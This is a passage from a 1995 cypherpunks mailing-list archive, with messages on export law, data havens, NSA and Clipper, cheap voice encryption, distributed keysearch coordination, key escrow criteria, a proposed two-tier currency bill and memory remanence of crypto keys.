Rich Salz writes:
> >Let's get real.
> 
> Yes, please.
> 
> The head of Sun's network security group is a foreign national.  They're
> doing DES and public key work. :)

Of course, under the law, foreign nationals are US Persons for
purposes of the ITAR if they are permanent residents.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 4 Sep 95 10:09:18 PDT
To: cypherpunks@toad.com
Subject: The Dangers of Caribbean Data Havens
Message-ID: <ac70802208021004b5e3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



From Bruce Sterling in "Islands in the Net" to various reports of data
havens and Internet services being set up by actual people, there has been
much speculation about using Caribbean islands for data havens.

But the infrastructure has been lacking. Low-bandwidth inter-island links.

And now yet another huge hurricane is bearing down on the Lesser Antilles,
heading directly for Puerto Rico and Hispaniola (Haiti and Dominican
Republic).

"Outages" lasting days or weeks after these islands get torn up every few
years will not go too well with international commerce.

Some fixes may help:

* higher-bandwidth connections, e.g., undersea fiber.

* satellites as primary or secondary connections

* more secure on-island facilities, designed to maintain contact with
satellites or fibers even with a Force 4 hurricane direct hit.

The "regulatory arbitrage" aspects still make using the Islands
advantageous (though they can be buffeted by political storms as well as
physical ones).

At least two current or past Cypherpunks are living in the Islands and
working on some schemes. Something to think about.

Personally, I think a distributed system based on crypto is a more robust
approach, the "Libertaria in Cyberspace" view I've talked about.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Date: Mon, 4 Sep 95 07:26:44 PDT
To: cypherpunks@toad.com
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <ac6fd726030210040224@[205.199.118.202]>
Message-ID: <199509041426.KAA24551@yakko.cs.wmich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May writes:

> Grumpiness warning: I have held my tongue the past few months as all of
> these "this t-shirt has been declared a munition!!!" messages went out, but
> I can hold my tongue no longer.
[...]

> It was this series of posts about whether wearing the "munitions t-shirt"
> near schools was a crime or not that made me think the silly season had
> arrived. If the t-shirt is a munition, and books are munitions, then
> libraries must be real "ammunition dumps," ready to explode at any minute.

"Printer's ink has been running a race against gunpowder these many, many
years. Ink is handicapped, in a way, because you can blow up a man with
gunpowder in half a second, while it may take twenty years to blow him up 
with a book. But the gunpowder destroys itself along with its victim, while
a book can keep on exploding for centuries."
  - Chistopher Morley, _The Haunted Bookshop_

Res ipsa loquitor. 


-- 
http://yakko.cs.wmich.edu/~frogfarm     ...with that fresh new lemon scent 
           Don't mess with someone unless they mess with you first.
                                   .o.
        "Creating and distributing neurolinguistic viruses since 1969"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Mon, 4 Sep 95 09:42:04 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509040052.RAA25910@netcom10.netcom.com>
Message-ID: <199509041641.KAA26589@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> but for some reason, the NSA keeps humming along...? perhaps 
> confirming the rule that bureacracies, like bores at parties,
> persist long after they are relevant?

Cryptography is a new science, it may be more effective to break in to an office
than to hack in to their computers, but maybe new discoveries will change that.

> understand marketing or human psychology. Clipper, the closest the
> agency has come to creeping out of the darkness of their coffin,
> was a total fiasco. the self-destructing director of NSA whats-his-name
> who as running for that FBI position or whatever is another example of how 
> the inbred spook society has difficulty dealing with anything outside
> their artificial reality.

I think you are dead wrong.  The NSA has mastered the market psychology.
Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
the NSA has had a hand in them all.  DES is by far the most popular cipher,
popular enough that it will takes years and years to switch to something new.
As for the clipper "fiasco,"  I would argue that it was an excellent marketing
move.  The NSA is aware that there is only a very very small percentage of 
society the thinks about crypto, with the internet and what have you it is now
possible for this minority to be heard, the NSA proposes clipper, and so we all
bitch about it because it's only secure against non-government attacks.  Now
the public hears this and resists clipper.  There isn't another product that is
winning support that clipper could have had.  You step back and look at it, and
the public is exactly where they were 5 years ago, no crypto.  
Clipper was a no lose situation for them, if it is adopted only they can read
all transactions made with it, if it isn't adopted, everybody can read all 
transactions, they didn't lose anything. 
They have some top minds working for them, it's been proven that they have been
a few steps ahead of the public for a long time; it's foolish to think they 
don't understand the psychology of the market.  Just as the public starts to 
desire something like public key crypto, they can publish a standard on it
and it is likely to be adopted.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Mon, 4 Sep 95 17:47:53 PDT
To: CYPHERPUNKS@toad.com
Subject: maximizing cryptographic return
Message-ID: <8B072A1.00030003E8.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


VZ> this list are aware of the idea that good encryption is often used
VZ> to send a low-bandwidth session key, which is then used to encrypt
VZ> that session using a less sophisticated but less computationally-demanding
VZ> algorithm. hence you seem to have good security at a computational
VZ> price that is less than encrypting everything with the secure protocol.

  Why must this process be limited to two levels?

VZ> I wonder if some very cheap algorithms, in terms of computation time,
VZ> could be used for the "on the fly" encryption of the voice using those
VZ> bit. would XOR with the pad be totally out of line?

  The RSA could be used by the caller to precompute the session key to
send to the reciever. The session key (IDEA or whatever) could be used
to send "subsession keys" which are actually parameters for the PRNGs
(use at least two, with different periodic characteristics, and XOR them
together) that create the pad for your XOR.

  The subsession size should be chosen so that very little "clearvoice"
is transmitted in each subsession. Perhaps a bit of randomness is in
order here, as well. Along with the PRNG parms, a length field, within
certain absolute limits. Now the spook doesn't even know where one
subsession ends, and the next begins.

  Add to this the use of a (lossy?) compression engine that can run with
little power, and a simple microcontroller (or several cheaper ones in
parallel-I can see one master for the session and subsession key
management and several slaves to handle the on-the-fly (en)(de)cryption
itself) should be able to do the job, fitting the subsession key
exchange in right along with the cyphervoice.

  Ideallly, we could have a box that could pull its power from the phone
line, and take touch-tone control inputs.


 * Long, long ago, in a tagline far far away...
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 4 Sep 95 08:25:49 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: maximizing cryptographic return
Message-ID: <199509041524.LAA15061@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:49 PM 9/3/95 -0700, Vladimir Z. Nuri wrote:
>the question of the cost-effectiveness of  phone encryption was raised by 
>my other message. I would like to question how cheaply good encryption
>could be done on phones, with a poor quality microprocessor.

It doesn't take much of a microprocessor to do real-time encryption and
decryption of digitized voice, at least for DES. The problem is the
vocoder. A good vocoder needs a fast DSP chip. A custom vocoder chip
could cut this cost considerably, look at how cheap data pumps for
V.34 modems have become with mass production. If ISDN ever becomes the
mass market standard, replacing analog local loops, it would be very
inexpensive to add encryption.

Even with today's phone system, I can't see why a mass market secure
telephone couldn't be built for less than $200. The problem is
convincing enough people that they need secure telephones to get
that mass market.

The secure telephone also needs to be transparent to the users.
It should be able to setup a secure connection without requiring
the user to press any buttons or know what hardware is at the other
end. The voice quality has to be much better than some of the
"Donald Duck" quality systems that have been used in the past.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 3 Sep 95 18:33:40 PDT
To: sjb@austin.ibm.com (Scott Brickner)
Subject: Re: SSL search attacks
In-Reply-To: <9508311728.AA16306@ozymandias.austin.ibm.com>
Message-ID: <199509040132.LAA21977@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com
  and Scott Brickner <sjb@austin.ibm.com>

Scott Brickner <sjb@austin.ibm.com> writes:
> Jiri Baum writes
...
> >Each client could pick a segment at random, check it and then broadcast
> >a NAK. Other clients would then know that the segment in question has
...
> This only reduces the cost if everyone is playing fair.  In practice,
...

No worse than fake NAKs to the central server (viz comment below).

> >One advantage is that it is not necessary to have a central infinitely
> >trusted server. (Nothing personal, but bogus server is an attack.)
> 
> An attack on what?  The overall model here is that someone presents
...

An attack on the attempt. If the key owner also volunteers a server,
then half the CPU cycles will report to that server (and be given
useless chunks of keyspace) thus halving the CPU power available to
the usual server ("half" in an infinitely naive world, of course).

The approach I suggested basically corresponds to everyone maintaining
hir own server; servers that trust each other will coordinate.
An attacker can of course NAK the key segment, but only those that trust
the attacker will take any notice.

> My point is that the "random" efforts are no different than everyone
> working on the problem independently, each picking a random place to
> start and going sequentially from there.

The difference is that in this scheme everyone does coordinate, only
it's peer-peer rather than client-server.

> >NAKs and IGRABs would be weighted by the trust accorded to the entity
> >that originated them.
> 
> This is similar to what I outlined yesterday afternoon.  Let unsolicited
...

I think that's where it came from. I really should provide citations,
shouldn't I...

...
> Invalid unsolicited NAKs
> don't destroy the current search, they only slow it down slightly ---
> but less than a fully random effort.

Similarly in the peer-peer approach, the effort is coordinated but
untrusted NAKs slow it down only slightly. The only "solicited" NAKs
will be your own.


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMEpXLSxV6mvvBgf5AQFn2QP/eJ0BlATPHS2xoLoJuHdJYR7Y5gN5scmK
DHOby7rGJ3Rj6CZ6PrdkQVf9ckUdmUwhCzAiCi3wnPHPf0gi4rPjLyBpmyTgl8yA
q+VqYPkBAflwHqXIsqbxx94PiZayt8b578Qtqoa2jJzjSCKMa8IonWGeztP/xNxa
FCmJDocudq4=
=r/Hv
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Sep 95 12:20:27 PDT
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: e$: More fun with cash: Senate Bill 307
In-Reply-To: <v02120d00ac70ea07f922@[199.0.65.105]>
Message-ID: <Pine.SUN.3.91.950904111848.5541B-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Mon, 4 Sep 1995, Robert Hettinga wrote:

> Has anyone heard about this bill?  Comments?

> >(c)  Currency Exchange--
> >     (1)  Plan--Not later than 12 months after the date of enactment of this
> >section, the Secretary shall devedlop and begin implementation of a plan to
> >require the exchange of all existing $100 denomination United States currency
> >held within and outside of the United States for $100 denomination domestic
> >use and nondomestic use United States currency issued in accordance with this
> >sectin.

. . .

> >     (1)  domestic use currency, issued in accordance with this section shall
> >be recognized as constituting a negotiable claim against the United States
> >Treasury only when presented within the United States, and shall constitute
> >legal tender for any debts, public or private, only when presented in the
> >United States, . . .

> >     (2)  nondomestic use currency shall be recognized as constituting a
> >negotiable claim against the United States Treasure, and legal tender
> >for any debts, public or private, only when presented outside of the 
> >United States, . . .

It's obvious that this bill has very little to do with large-scale
money laundering, narcotrafficking nor terrorism.  All those folks 
will simply use "domestic use currency" inside or outside of the 
United States.  At worst, it will cause them a one-time problem.

Then at whom is the bill really aimed?  Average, middle-class
Americans, is my guess.  Fortunately, it doesn't look too tough
to get around.  If you have a matress full of C-notes, I suggest
you start using them to buy travelers checks--including a few
denominated in strong foreign currencies.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: microbody@wirepool.ruhr.de (Matthias Jordan)
Date: Mon, 4 Sep 95 17:45:40 PDT
To: cypherpunks@toad.com
Subject: Q: PGPfone where
Message-ID: <5tEkFnD0J2B@blank.wirepool.ruhr.de>
MIME-Version: 1.0
Content-Type: text/plain


Hello, guys!
I just want to know where to get PGPfone outside the USA.
Ciao!

  /\/\icroBod\/     |\?/|  SoziBits <----    Anschlaege Drogen Waffen
 /    \______/      | I |  Falken im Netz    RAF ETA KGB LSD XTC BND




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Mon, 4 Sep 95 10:58:47 PDT
To: cypherpunks@toad.com
Subject: Re: The Dangers of Caribbean Data Havens
In-Reply-To: <ac70802208021004b5e3@[205.199.118.202]>
Message-ID: <YSzSwkkAseEU084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 4 Sep 1995, tcmay@got.net (Timothy C. May) wrote:

> From Bruce Sterling in "Islands in the Net" to various reports of data
> havens and Internet services being set up by actual people, there has been
> much speculation about using Caribbean islands for data havens.

> But the infrastructure has been lacking. Low-bandwidth inter-island links.

> And now yet another huge hurricane is bearing down on the Lesser Antilles,
> heading directly for Puerto Rico and Hispaniola (Haiti and Dominican
> Republic).

> "Outages" lasting days or weeks after these islands get torn up every few
> years will not go too well with international commerce.

> Some fixes may help:

> * higher-bandwidth connections, e.g., undersea fiber.

I don't have the citation handy, but I recall reading that Cable &
Wireless has plans to link much of the region via undersea fiber over
the next few years.  I think it will be a simple North-South line --
Virgin Islands to Trinidad and Tobago or something like that, bypassing
the Caymans, etc.  The cost of the project is outweighed by the gains
of eliminating these recurring weather-related outages.

In fact, someone (Duncan?) may have posted the press release here over
a year ago.

Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEs3CVRRFMq4NZY5AQG1bQP/SpX3Q4oVYy1BZMALu5jCWOZPi9h1DCNn
hJQ//+sRstVRhq3Alek2KHqLtO0lJdngD0RO/zrWwfy+49wFjgplyfSpwlVMFPh/
DrUxZcl3yRkfzTt+4pJtrAjuKGz6uKtbMnZ5NlCI19K9csqt2z4Di93nGwQYDG12
RccfMnhsT6Y=
=Bcpk
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 4 Sep 95 09:55:34 PDT
To: cypherpunks@toad.com
Subject: RE: Key attributes (was: pseudonyms & list health)
Message-ID: <46463.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  cman@communities.com (Douglas Barnes)  writes:
> If anyone still has the flyer from the Crypto '95 rump session,
> there was a guy there talking about ANSI standards, and one of
> the things he mentioned in his talk was work they were doing on
> "key attributes."
> I spoke with him afterwards, and we had a lively discussion about
> this matter; especially with regard to the relationship between
> key certification and key attributes. I argued that certification is
> just another kind of attribute, while he is fairly hung up on
> certificate hierarchies, etc.

Did he perchance work for some US Federal Agency such as NIS&T?
Or a large corporation?

My small PGP key was created at the National Computer Security Conference
in 1992. About half the attendees were NSA, and lots more were from
assorted defense and civilian agancies. During the free time, I talked
to a bunch of them about Phil's web of trust.

I had a really hard time understanding with where they were comming from,
and they had no clue as to why I thought hierarchical CA chains are
so bad.

I didn't convince anyone. But I have come to understand that if you spend
your entire working life in a job that is structured from the President
on down a heirarchy, you can't imagine any other organizational structure.

This includes the obvious LEAs such as FBI, ATF, all the Defense folks
and sppoks like CIA, DIA, NSA, and the standards "setting"
folks out at NIS&T.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Mon, 4 Sep 95 09:55:39 PDT
To: pfarrell@netcom.com
Subject: Acceptable NIS&T restrictions
Message-ID: <46477.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


If we can break away from t-shirts as munitions...

I'm going to the NIS&T session this week. I'm trying to figure out
what, if any, part of the process can be made acceptable to
those in favor of bringing US policy into the 90s. I'm not sure
that this is possilbe.

NIS&T published (and it has been reposted to the list and sci.crypt
many times) their goals. Can we make suggestions to any that
are acceptable and realistic?

Here are some of their criteria:

    "Avoiding multiple encryption -- How can the product be
     designed so as to prevent doubling (or tripling, etc.) the
     key space of the algorithm?"

CME has been suggesting DES | TRAN | DES | TRAN | DES
for years. Can they really _avoid_ (i.e. prevent) this?

    "Disabling the key escrow mechanism -- How can products be
     made resistant to alteration that would disable or
     circumvent the key escrow mechanism?  How can the "static
     patch" problem be avoided?  How can this be tested?"

This is easy in hardware. Is it even possible in software?

    "Practical Key Access -- How can mechanisms be designed so
     that repeated involvement of escrow agents is not required
     for decryption for multiple files/messages during the
     specified access period?"

At least this has a chance of being real. We need to have a suggestion
for expiration times for the escrowed keys. This was a huge problem with the
initial Clipper.

Is there a reasonable middle ground between long term keys such
as PGP uses, and the ephemeral keys of a D-H exchange?

    "Certified escrow agents -- Can products be designed so that
     only escrow agents certified by the U.S. government
     (domestic, or under suitable arrangements, foreign) are
     utilized?  What should be the criteria for an acceptable
     U.S. escrow agent?"

We all know that Tim's Flakey Key Escrow Service is most likely not
"an acceptable US escrow agent." But since CKE is a good thing, what
are the characteristics of an acceptable service to us?

I've added the discussion "topics" that NIS&T sent to participants to my
WWW pages if you want to see them all,
http://www.isse.gmu.edu/~pfarrell/nistmeeting.html
But I expect that most of the criteria that I edited out are
unacceptable to most on this list. Without further discussion.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 4 Sep 95 10:42:03 PDT
To: www-buyinfo@allegra.att.com
Subject: e$: More fun with cash: Senate Bill 307
Message-ID: <v02120d00ac70ea07f922@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone heard about this bill?  Comments?

Cheers,
Bob Hettinga

>From: glasgow@geoserv.isgs.uiuc.edu (Mary.Glasgow)
>Subject: Senate Bill 307 2-tier Money System
>Date: 31 Aug 1995 13:54:45 GMT
>Organization: University of Illinois at Urbana
>Summary: Senate Bill 307 2-Tier Money System
>Keywords: Senate Bill 307 2-Tier Money System
>
>In the Senate of the United States, January 30, 1995, Mr. Leahy introduced
>the following bill, which was read twice and referred to the Committee on
>Banking, Housing, and Urban Affairs.
>
>...for purposes of brievty, I will quote only from sections (c) Currency
>Exchange and (d) Domestic Use and Nondomestic Use Currency.
>
>(c)  Currency Exchange--
>     (1)  Plan--Not later than 12 months after the date of enactment of this
>section, the Secretary shall devedlop and begin implementation of a plan to
>require the exchange of all existing $100 denomination United States currency
>held within and outside of the United States for $100 denomination domestic
>use and nondomestic use United States currency issued in accordance with this
>sectin.
>
>     (2)  Exchange Requirements--The plan established under paragraph (1) shall
>require the currency to be exchanged--
>         (A) at financial institutions regulated under United States law and
>subject to United States currency transaction reporting and other money
>laundering deterrence requirements; or
>         (B) at financial institutions that the Secretary finds, because of
>treaty obligations, other provisions of law, or other agreements, are
>required to report significant transactions in United States currency to
>the United States Treasury, and abide by such obligations.
>     (3)  6-Month Exchange Period--
>          (A) In general--During the period beginning on the date that is 12
>months after the date of enactment of this section and ending on the date
>that is 18 months after that date of enactment, the Secretary shall permit
>the exchange of circulating $100 denomination United States currency for
>equal numbers of the domestic use and nondomestic use $100 currency issued
>in accordance with this section at institutions described in paragraph (2).
>          (B) Non-Negotiability--Except for claims pursuant to subsection (e),
>beginning on the dat that is 18 months after the date of enactment of this
>section, the United States Treasury shall not recognize $100
>denomination
>United States currency issued prior to the date that is 12 months after the
>date of enactment of this section as constituting a negotiable claim against
>the United States Treasury, and such currency shall not constitute legal
>tender for any debts, public or private.
>
>(d)  Domestic Use and Nondomestic Use Currency--Beginning on the date that is
>18 months after the date of enactment of this section--
>     (1)  domestic use currency, issued in accordance with this section shall
>be recognized as constituting a negotiable claim against the United States
>Treasury only when presented within the United States, and shall constitute
>legal tender for any debts, public or private, only when presented in the
>United States, but such currency may be exchanged for equal values of $100
>denomination nondomestic use currency (or other United States currency) only
>at financial institutions regulated by United States law and subject to
>United States currency transaction reporting and other money laundering
>deterrence requirements; and
>     (2)  nondomestic use currency shall be recognized as constituting a
>negotiable claim against the United States Treasure, and legal tender
>for
>any debts, public or private, only when presented outside of the United
>States, but such currency may be exchanged for equal values of $100
>denomination domestic use currency (or other United States currency) at
>financial institutions regulated by United States law and subject to
>United States currency transaction reporting and other money laundering
>deterrence requirements.
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Mon, 4 Sep 95 11:02:38 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <199509041812.NAA06959@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>To: TCMAY@GOT.NET, CYPHERPUNKS@toad.com
>Subject: Re: A problem with anonymity
>From: monty.harder@famend.com (MONTY HARDER)

>
>
>  But if the escrow agent is anonymous, we simply recurse, moving now to
>the question of whether anyone can trust the Anonymous Escrow Agency not
>to take the money and run.
>
>TC> (I mention banks because, when you look at it closely, today's banks can
>TC> quite easily claim that a customer made a withdrawal when he didn't. That
>TC> they don't says more about the nature of persistent businesses than about
>TC> any government oversight or security features. This is a side point, but it
>TC> bears keeping in mind that the real world of banks and businesses, etc., is
>TC> not fully secure, either. And yet it mostly works pretty well. The reasons
>TC> for this are interesting to consider.)
>
>  A bank has $$ invested in impressive-looking buildings, (so that
>vanishing into the ether and setting up shop elsewhere is rather
>difficult) and several officers whose TrueNames are registered with the
>appropriate agencies, so that they may be sued if they pull this
>crap.
>
>  While individual stockholders might appreciate the anonymity (and
>protection from legal action) of owning stock in a bank or escrow agency
>(might just combine the functions, while we're at it), they demand
>onymity of the officers with whom they entrust the keys to the
>corporation.
>Monster@FAmend.Com *    
>
>
The real secret is that for most banks the individual transaction
is << than the total stream of transactions.  Defaulting on a single
transaction will show a profit that is miniscule compared to the
over-all earnings at stake if the bank's credibility is jeopardized.
When banks have gotten into trouble it is frequently when they allow
one customer or one transaction to represent a significant share
of their business.  You have a high probability of being able to
trust an escrowee with your $1 if you know he intends to collect
commissions on holding $1million for others based on his "trusted"
representation.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Mon, 4 Sep 95 14:59:35 PDT
To: cypherpunks@toad.com
Subject: Seattle area Cypherpunks
Message-ID: <199509042159.OAA15140@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


With the Labor Day weekend/vacation season almost over and a variety of projects completed, I'm going to attempt to jump-start Cypherpunk activities in the Seattle area (the Seattle Cypherpunks sub-list appears to have withered away, so delete this if you're outside the Pacific Northwest). 

The first order of business is to get an idea of how many people would be interested in meeting some evening, likely toward the end of September.  Send me e-mail (please don't reply to the list) with a time and geographic preference as to location.  I'm on the Eastside, so will be slightly biased in finding an appropriate meeting place in the Bellevue/Redmond area, unless persuaded otherwise.

Also, let me know if you're interested in discussing (or presenting) any specific crypto/privacy/ecash-related topics in a very informal setting.  Aside from key signing and general face-to-face networking, I would like to have a few set items on the agenda.  Any suggestions welcomed.

Based on your responses, I'll do all of the running around and organizational type activities, and follow-up with e-mail and a general announcement to the main list when arrangements are finalized.

This is an opportunity to get away from your keyboards and meet other folks who share your interests.  Hope to see you later this month.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 4 Sep 95 12:04:13 PDT
To: cypherpunks@toad.com
Subject: my crypto rump session abstract
Message-ID: <9509041912.AA06063@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


(the one that david sternlight misinterpreted to mean that we
had proven that clipper has no back doors):

M. Blaze, J. Feigenbaum, F.T. Leighton, "Master Key Cryptosystems",
Crypto '95 "rump session" abstract, August 1995.  Available as:
ftp://research.att.com/dist/mab/mkcs.ps

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 4 Sep 95 15:17:31 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <Pine.SUN.3.91.950904173143.17862B-100000@access2.digex.net>
Message-ID: <199509042217.PAA17498@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Anon writes>
> When a running computer is seized in some sort of law enforcement
> raid, what are the chances someone would think to backup the
> contents of a RAMDISK drive prior to powering it down?

Also note the recent posting on sci.crypt by Peter Gutmann about being
able to recover data from DRAMs and SRAMs after powerdown. It hits
cryptokeys really bad. 

I suppose this is really academic at the current stage, but that might
change.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 4 Sep 95 15:43:30 PDT
To: cypherpunks@toad.com
Subject: Encrypted desktop videoconferencing
Message-ID: <199509042240.PAA01994@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



A friend of mine works for a large input-device company, and they are looking
to get into the desktop videoconferencing business.  Their current business 
is extremely competitive on price, and they'd like to do something in
desktop videoconferencing that would distinguish them from everybody else.
Naturally, I suggested cryptography.

I have always thought that the biggest problem introducing crypto to
phone conversations was the large amount of cpu speed and software complexity
to digitize the audio; that adding the crypto code is relatively minor.
Certainly RC4 and IDEA for instance, run very fast.  In videoconferencing
applications, this audio compression is already being done, so adding
the crypto should be almost free.

Well, except for licensing costs.  I'd really like to use Diffie-Hellman
to negotiate a key.  Does anyone know how much it would cost to license
that from PKP?  I'd expect that there would be a one time fee, plus
a per-copy-sold fee.

Does anybody know - and if so, can they say - if anybody else has added
or is adding cryptography to their videoconferencing systems?  It seems
like such a killer ap that I must be overlooking something.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Mon, 4 Sep 95 13:06:17 PDT
To: cypherpunks@toad.com
Subject: alpha.c2.org nymserver source code
Message-ID: <m0sphST-0012qYC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


I have packaged up the source for the nymserver I run on alpha.c2.org,
and written a brief description of how to install it.  E-mail me if you
want it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 4 Sep 95 16:14:32 PDT
To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <Pine.SUN.3.91.950904184522.20203A-100000@access5.digex.net>
Message-ID: <199509042314.QAA18360@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Someone proposed that one could wipe the memory before power-down, for
example during 1 second or something like that. Unfortunately, that
wont help, unless I misread the paper. It is effectively the same as
if the key had been stored in the cell for 1 second less, nothing else.

The only way I can see how to avoid generating "imprints" of more or
less static data is to make them non-static. Start circulating them
around.

One way that springs to mind for keys are to do something like
inverting the meaning of the key every x milliseconds. Like this; 

     /* pseudo code */
     char master_key[KEYSIZE];
     int  meaning = ZEROS;

     void encryption(char *input, char *output); /* implicit master_key */
     int using_key = FALSE;

     main() {
       input_from_keyboard(master_key);
       timer(100 ms, flipem()); /* calls flipem every 20 ms */

       main_loop(); /* occansionally using encryption() */
     }

     void flipem() {

       if (using_key) /* risk of never being able to flipem() */
         return;
   
       /* some kind of semaphored section */
       using_key = TRUE;
       master_key = inverse(master_key);
       meaning = (!meaning);
       using_key = FALSE;

     }

     void encryption(char *input, char *output) {

      char real_key[KEYSIZE]; /* must be on stack */

      copy_key(real_key, master_key);
      if (meaning == ONES)
        invert(real_key);           /* recovering real content */
      encrypt(input, output, real_key);

      write_random_key(real_key); /* so "real" key doesn't become 
                                     imprinted as well. */
     }

Do don't care about the plaintext in the above. Nor stack content vrey
much. Nor about coding style.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 4 Sep 95 13:31:43 PDT
